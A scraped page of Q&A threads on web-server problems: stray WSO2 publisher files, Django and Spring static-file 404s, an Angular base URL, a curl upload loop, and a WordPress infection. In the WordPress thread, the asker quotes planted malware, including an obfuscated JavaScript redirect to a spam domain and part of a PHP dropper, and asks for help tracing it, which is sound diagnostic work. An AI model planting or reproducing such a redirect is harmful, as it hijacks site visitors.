WSO2 API Manager is saving hundreds of 'publisher' HTML files to directory - wso2-api-manager

WSO2 API Manager is saving hundreds of 'publisher' HTML files (every day) to directory "/root"
All of the files have names like:
publisher.1
publisher.2
publisher.3
...
publisher.978
etc
How do I stop it from creating these files, or at least how can I change the output directory for the files?
The contents of each file is HTML:
<!DOCTYPE html>
<html lang="en">
<head>
<script>
var requestURL = '/publisher';
var ssoEnabled = 'false';
var tenantDomain = 'null';
</script>
<title>API Publisher- Login</title>
<meta charset="UTF-8">
...
...
...
<script>
var siteRoot = '/publisher/site/themes/wso2';
</script>
<script type="text/javascript" src="/publisher/site/themes/wso2/libs/jquery.cookie.js"></script>
<script type="text/javascript" src="/publisher/site/themes/wso2/templates/utils/button-loader/jquery.buttonLoader.js"></script>
</body>
</html>
Looked in a bunch of config files, and in carbon management settings, but can't find anything that looks like it controls this.
Expect no html files to be saved at all to root directory.

Going through the file content you have given, it seems to be the rendered output of a publisher page,
because the following script tag comes from the base template in the WSO2 API Manager publisher app.
<script>
var requestURL = '/publisher';
var ssoEnabled = 'false';
var tenantDomain = 'null';
</script>
But there is no possibility to write the rendered HTML pages to /root/ directory or to anywhere else in the file system.
Also, by default (in Unix systems), only the root user has read and write permission on the /root/ directory. So unless you run a tool with root permission, it can't write files to the /root/ directory.
WSO2 API Manager does not need root permission to run, nor is it recommended to start the server with superuser privileges.
So I think this should have been done by some external tool.
For example: If you have configured a health-check tool to GET a /publisher page and write the snapshot of the page to file system each time you perform the health check and if that is configured to write to /root/ directory this could have happened.
Can you check
Whether these files are created in equal time intervals
Who is the owner of these files (ls -lh)
And also check whether WSO2 API Manager is running with the same user who has created those files (ps -aux | grep wso2server).
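
The first two checks in the answer above, scripted as an added example (not part of the original answer): it reports which UIDs own the files and whether their modification times are evenly spaced, as output from a scheduled job would be. The glob pattern, the 10% tolerance and the function names are assumptions for illustration; compare the reported UIDs with the user shown by the ps command.

```python
import glob
import os
import statistics
import tempfile

def summarize_drops(pattern, tolerance=0.1):
    """Report owner UIDs and mtime spacing for files matching `pattern`."""
    stats = sorted((os.stat(p) for p in glob.glob(pattern)), key=lambda s: s.st_mtime)
    if len(stats) < 2:
        return None
    gaps = [b.st_mtime - a.st_mtime for a, b in zip(stats, stats[1:])]
    median = statistics.median(gaps)
    # Evenly spaced files (every gap close to the median) point to a scheduler
    # such as cron or a monitoring probe rather than to interactive use.
    regular = median > 0 and all(abs(g - median) <= tolerance * median for g in gaps)
    return {"count": len(stats), "owner_uids": sorted({s.st_uid for s in stats}),
            "median_gap_s": median, "regular": regular}

def make_sample(directory, n=5, step=300):
    """Constructed sample: publisher.1..n with mtimes `step` seconds apart."""
    for i in range(1, n + 1):
        path = os.path.join(directory, f"publisher.{i}")
        with open(path, "w") as fh:
            fh.write("<html></html>")
        os.utime(path, (1_700_000_000 + i * step,) * 2)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        make_sample(d)
        print(summarize_drops(os.path.join(d, "publisher.*")))
```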

Related

static-files 404 not found on hosted django app

I'm having a hard time displaying my static files on my webpages. I'm hosting my website on DigitalOcean Ubuntu 18 and my static files are stored on the DigitalOcean space. Initially everything was okay and working correctly until I added 3 new images to the server and ran the collectstatic command afterwards; note this was for the second time, because I ran it the first time to store the files in the DigitalOcean space folder I created. The collectstatic command showed me a warning saying
UserWarning: The default behavior of S3Boto3Storage is insecure and will change in django-storages 2.0. By default files and new buckets are saved with an ACL of 'public-read' (globally publicly readable). Version 2.0 will default to using the bucket's ACL. To opt into the new behavior set AWS_DEFAULT_ACL = None, otherwise to silence this warning explicitly set AWS_DEFAULT_ACL. "The default behavior of S3Boto3Storage is insecure and will change "
After I continued by typing yes, the files and images are successfully stored in the digital-space, but ever since I ran the collect command for the second time all static files are not displayed. I did some further reading about this warning and used the solution from AWS S3 and Django returns "An error occurred (AccessDenied) when calling the PutObject operation", but still nothing changed: the warning went away but the static files are still not found.
Here's the error message from the Chrome browser: Failed to load resource: the server responded with a status of 404 (Not Found)
Have you ensured your settings display this:
STATIC_ROOT = os.path.join('static')
STATIC_URL = '/static/'
Following this, your templates should show the following:
<link rel="stylesheet" type="text/css" href="{% static '/locationofstatics/css/style.css' %}">
<link rel="stylesheet" type="text/css" href="{% static '/locationofstatics/css/bootstrap.css' %}">
The best way to go about things in my opinion is to only collectstatic locally and then push all of the local files and directories up to the server. What do you currently use to transfer files to the server side?
The other thing you need to do is ensure that Nginx has the location of your static files set within the sites-available file. From your ssh terminal (server side terminal) you can type:
sudo nano /etc/nginx/sites-available/projectname
Within this you need to add the location of your statics, for example:
server {
location /static/ {
root /home/name/projectname;
}
}
The following documents are extremely useful:
https://www.digitalocean.com/community/tutorials/how-to-set-up-django-with-postgres-nginx-and-gunicorn-on-ubuntu-16-04
https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-18-04
I was using nginx server in digitalocean for my django project.
front-end static files were working but admin not.
See my static files setting:
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
front-end css in static folder and collectstatic target folder is staticfiles
So our main focus is STATIC_ROOT means staticfiles folder. In nginx settings put "staticfiles" instead of "static" to set static file location.
Your STATIC_ROOT folder name could be anything; you need to use that same name in nginx.
See below code for nginx setting:
location /staticfiles/ {
root /home/[your_username]/[your_project_folder];
}
[your_username]: which you are using to host your project on digitalocean.
The whole thing is that, you need to use your STATIC_ROOT folder in nginx setting.
Command to create/edit nginx setting is:
sudo nano /etc/nginx/sites-available/[your_project_folder]

How to find the malware PHP script in Wordpress which creates viruses and spam

I have a website and I am using Wordpress (latest version and all plugins updated) as CMS. Two days ago, Google Search Console team informed me about a virus on one of my posts. A cryptic subfolder named ZxmPeG placed in the wp-content folder has been identified and has the following content:
.63ec5597b4a4550c25cb25d4b6ba0186400c5cb5 with the content {"0":46,"4":122,"3":2}
.htaccess with the content DirectoryIndex index.php
<Files index.php>
order allow,deny
allow from all
</Files>
index.php with the content (only partial shown) <?php
class Rst { const PLATFORM_UNKNOWN = 0; const PLATFORM_ANDROID = 1; const PLATFORM_APPLE = 2; const PLATFORM_LINUX = 3; const PLATFORM_WINDOWS = 4; private $contentData = '...
If the link is directly accessed, a word document (extension .doc) is downloaded.
Next, in the root folder of the Wordpress installation, there is another cryptic html file named csvjsjd.html with the content
<html>
<head>
<script>
var fovxy = "n";
window.location.href = "https://newdiscount.zo" + fovxy + "e/?tr=13058";
</script>
</head>
<body>
</body>
</html>
<!-- 6c3f8b203473a9e45d8471d5072119a9 -->
If I delete the folder and files, they are recreated within a couple of minutes.
I have root access to my VPS and I have run the following tools to verify that no rootkit is installed:
Lynis
Chkrootkit
Rkhunter
My system is clean. I assume it is related to Wordpress only because once I stopped Apache2, the files are not recreated. Also, I have not found any other strange-looking objects anywhere else on my Debian 9.9 machine.
I have tried to disable all WP plugins. The problem still remains.
Next, I used auditctl to watch the files. From the log file, I could just see that there are a lot of foreign IP addresses accessing the files. But I was not able to identify the process which is responsible for creating those files.
Do you know any tools to trace the PHP script which is causing that malware?
Thanks a lot!
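
One way to narrow this down from the audit log, as an added example that is not part of the original post: when PHP runs inside the web server, the audit record for a file creation names the server process rather than the script, so the creation time is matched against access-log requests that started just before it. The audit records (abbreviated), access-log lines, the `wpwatch` key, the `hypothetical.php` path and the 2-second window are constructed assumptions.

```python
import os
import re
from datetime import datetime

# Constructed, abbreviated sample data (not from the post).
AUDIT = '''\
type=SYSCALL msg=audit(1560000000.120:901): syscall=2 success=yes pid=1432 uid=33 comm="apache2" exe="/usr/sbin/apache2" key="wpwatch"
type=CWD msg=audit(1560000000.120:901): cwd="/var/www/html/wp-content"
type=PATH msg=audit(1560000000.120:901): item=1 name="ZxmPeG/index.php" nametype=CREATE
type=SYSCALL msg=audit(1560000041.300:902): syscall=2 success=yes pid=1440 uid=33 comm="apache2" exe="/usr/sbin/apache2" key="wpwatch"
type=PATH msg=audit(1560000041.300:902): item=0 name="/var/www/html/wp-content/ZxmPeG/index.php" nametype=NORMAL
'''
ACCESS = '''\
203.0.113.7 - - [08/Jun/2019:13:19:59 +0000] "POST /wp-content/uploads/hypothetical.php HTTP/1.1" 200 12
198.51.100.4 - - [08/Jun/2019:13:20:41 +0000] "GET /wp-content/ZxmPeG/index.php HTTP/1.1" 200 5120
'''

def creations(audit_text, watched):
    """Group audit records by event id; return events that CREATE a file under `watched`."""
    events = {}
    for m in re.finditer(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\):(.*)$", audit_text, re.M):
        rtype, ts, serial, rest = m.groups()
        f = {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', rest)}
        ev = events.setdefault((ts, serial), {"ts": float(ts), "paths": []})
        if rtype == "SYSCALL":
            ev.update(exe=f.get("exe"), pid=f.get("pid"), uid=f.get("uid"))
        elif rtype == "CWD":
            ev["cwd"] = f.get("cwd")
        elif rtype == "PATH" and f.get("nametype") == "CREATE":
            ev["paths"].append(f.get("name", ""))
    for ev in events.values():
        # PATH names may be relative to the CWD record of the same event.
        full = [os.path.normpath(os.path.join(ev.get("cwd", "/"), p)) for p in ev["paths"]]
        ev["paths"] = [p for p in full if p.startswith(watched)]
    return [ev for ev in events.values() if ev["paths"]]

def requests_before(access_text, event_ts, window=2.0):
    """Return (method, path) of requests logged within `window` seconds before event_ts."""
    out = []
    for m in re.finditer(r'\[([^\]]+)\] "(\S+) (\S+)', access_text):
        t = datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z").timestamp()
        if 0 <= event_ts - t <= window:
            out.append((m.group(2), m.group(3)))
    return out

if __name__ == "__main__":
    for ev in creations(AUDIT, "/var/www/html/wp-content/ZxmPeG"):
        print(ev["exe"], ev["pid"], ev["paths"], requests_before(ACCESS, ev["ts"]))
```

Requests returned for a creation event are candidates to inspect, not proof; a busy site needs a narrower window or repeated matches across several recreations.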

Loading static resources with custom directory structure in spring boot application

I have a spring boot application that contains static resources in the structure indicated below ( + indicates directories, - indicates files)
+ my-app
+ src
+ resources
+ static
+ v1
+ css
- app.css
- main.js
- index.html
I have sub-directory that contains the application bundles. By default, Spring looks for index.html directly under resources/static directory. It does not find one in this case.
My index.html looks something like this
<html>
<head>
<script type="text/javascript" src="main.js"></script>
<link type="text/css" href="css/app.css"/>
</head>
<body>
</body>
</html>
Let us assume the application is hosted at http://myapp.com.
I have two questions here
How can I make Spring look for v1/index.html under my static resources, when I access the application at the URL http://myapp.com?
If I load v1/index.html by adding a view controller in ViewControllerRegistry, it does load index.html under v1 directory, but gives 404 on all the resources used by index.html (main.js & css/app.css).
How can I tell Spring to get all resources from resources/static/v1, instead of resources/static?
I created a basic Spring Boot Project in STS and did not add any dependencies. I used your html sample from above and modified it to this:
<html>
<head>
<script type="text/javascript" src="main.js"></script>
<link rel="stylesheet" type="text/css" href="/v1/css/app.css"/>
</head>
<body>
<h1>Hello World</h1>
</body>
</html>
I created the directory /src/resources/static/v1 and /src/resources/static/v1/css, placing the index.html file in the ../v1 directory which worked. The app.css file contained the following for testing purposes:
h1 {
color:red;
}
This worked without any configuration changes to Spring. If you are using Thymeleaf, JTwig, JSP... you may need to add resource handlers or tweak settings for those template engines, I can't comment since I didn't use a template engine based on your example. Anything in the /static directory will be referenced without the /static.
I hope that helps, if it does please mark the answer as the right answer.

How to set Angular2 cli baseurl for a new web site?

I have an existing ASP.NET MVC web site. www.foo.com
I want to create a whole new sub system of our site using Angular2 and I want it to go under www.foo.com/NewSubSystem.
I have downloaded the Angular2 Cli from https://cli.angular.io/.
When I run from the command line
ng build -dev
The output has all the JavaScript script tags looking like this in the index.html file
<script type="text/javascript" src="inline.bundle.js"></script>
<script type="text/javascript" src="styles.bundle.js"></script>
<script type="text/javascript" src="main.bundle.js"></script>
I need the src="www.foo.com/NewSubSystem/inline.bundle.js"
NOTE: I have tried to update the baseURL in the tsconfig.json
"compilerOptions": {
"baseUrl": "www.foo.com/NewSubSystem"
}
but this does not seem to make any difference.
Any suggestions or pointers would be nice. Thanks
Set the index file baseref
base href="NewSubSystem/"
Then just code like it's the root.
I reset the baseref to dist/ with javascript depending on the env sensed
Change your index.js files update
<base href="/<you base url>/">
if you are working with webpack:
You should also update the file config/webpack.common.js, so that your assets folder content can be hosted from your new baseurl.
...
const METADATA = {
title: 'ng2-admin - Angular 2 Admin Template',
description: 'Free Angular 2 and Bootstrap 4 Admin Template',
baseUrl: '/<you base url>/',
isDevServer: helpers.isWebpackDevServer()
};
.....

using curl, shell scripting how to upload all the files in Specific path to host?

I have written a script to upload all the files from a specific local folder to the host, but there was some issue and the files are not getting uploaded to the host.
#!/bin/sh
for i in /main/folder_1/path/*
do
curl -u Pass:"Uname" -T $i http://www.example.com/folder/path/$i
done
echo "*****File Uplodaed ******"
Help me to solve this. The following is the error that I got:
<html>
<head>
<title> 500 Internal Server Error </title>
</head>
<body>
<h1>
Internal Server Error
</h1>
</body>
</html>
Currently I have the script inside /main/folder_2. If I change /main/folder_1/path/ to ../folder_1/path/, I got the output as the files are moved, but I want to run the script with the complete path specified.
